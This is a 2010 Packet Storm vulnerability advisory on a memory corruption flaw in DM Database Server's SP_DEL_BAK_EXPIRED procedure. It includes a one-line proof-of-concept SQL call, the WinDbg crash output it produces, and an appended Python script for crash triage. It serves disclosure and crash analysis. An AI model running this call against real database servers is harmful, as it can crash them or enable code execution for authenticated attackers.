DM Database Server Memory Corruption

02 Jun 2010 00:00:00 | Reported by: Shennan Wang | Type: packetstorm | Source: packetstormsecurity.com

Memory corruption vulnerability in DM Database Server. An attacker can execute arbitrary code or cause a DoS. Authentication is required.

Code
`DM Database Server Memory Corruption Vulnerability  
  
  
Vulnerable: All versions  
Vendor: www.dameng.com  
Discovered by: Shennan Wang (HuaweiSymantec SRT)  
  
  
Details:  
=========  
A vulnerability in all versions of DM Database Server allows an attacker to execute arbitrary code or cause a DoS (Denial of Service).  
Authentication is required to exploit this vulnerability.  
  
The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.  
  
  
POC:   
=========  
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');  
  
  
  
(458.5fc): Access violation - code c0000005 (!!! second chance !!!)  
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c  
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0 nv up ei pl zr na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246  
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\dmdbms\bin\wdm_dll.dll -   
wdm_dll+0xd1753:  
100d1753 f2ae repne scas byte ptr es:[edi]  
0:009> da ebp  
074ed1fc "AAAAAAAAAAAAAAAAAAAA"  
  
  
  
Timeline:  
========  
2010.04.17 Reported to vendor, no response.  
2010.05.31 Public  
`
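
A crash-triage example for the debugger output above, added here and not part of the original advisory: it parses the register dump and faulting instruction and recognises the `repne scas` string-length scan on the pointer in `edi`. The `triage` function and the 64 KB null-guard threshold are assumptions of this example; the dump lines are copied from the advisory with trailing whitespace trimmed.

```python
import re

# Crash excerpt copied from the advisory (registers and faulting instruction).
DUMP = """(458.5fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0 nv up ei pl zr na pe nc
wdm_dll+0xd1753:
100d1753 f2ae repne scas byte ptr es:[edi]
"""

REG = re.compile(r"\b(e[abcd]x|e[sd]i|e[isb]p)=([0-9a-f]{8})")
EXC = re.compile(r"code ([0-9a-f]{8})")
SITE = re.compile(r"^(\w+)\+0x([0-9a-f]+):$", re.M)
INSN = re.compile(r"^([0-9a-f]{8}) ([0-9a-f]+) +(.+)$", re.M)

# Assumption: default 32-bit Windows layout, where the lowest 64 KB is never mapped.
NULL_GUARD = 0x10000


def triage(dump):
    """Summarise a WinDbg x86 crash excerpt for a bug report or ticket."""
    regs = {name: int(val, 16) for name, val in REG.findall(dump)}
    module, offset = SITE.search(dump).groups()
    addr, _opcode, text = INSN.search(dump).groups()
    out = {
        "exception": int(EXC.search(dump).group(1), 16),
        "module": module,
        "offset": int(offset, 16),
        "insn": text.strip(),
        # Sanity check: the disassembled address must be the faulting eip.
        "eip_matches": int(addr, 16) == regs["eip"],
    }
    # repne scasb with al == 0 and ecx == 0xffffffff is the inlined strlen()
    # idiom: scan forward from edi until a NUL byte is found.
    if (text.startswith("repne scas byte")
            and regs["ecx"] == 0xFFFFFFFF and regs["eax"] & 0xFF == 0):
        out["idiom"] = "inline strlen"
        out["scanned_ptr"] = regs["edi"]
        out["near_null"] = regs["edi"] < NULL_GUARD
    return out


if __name__ == "__main__":
    for key, value in triage(DUMP).items():
        print(f"{key}: {value:#x}" if isinstance(value, int)
              and not isinstance(value, bool) else f"{key}: {value}")
```

On this dump the fault is a read during a string-length scan of address 0x41c inside `wdm_dll`, which is the detail to record when tracking the crash against a vendor fix.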
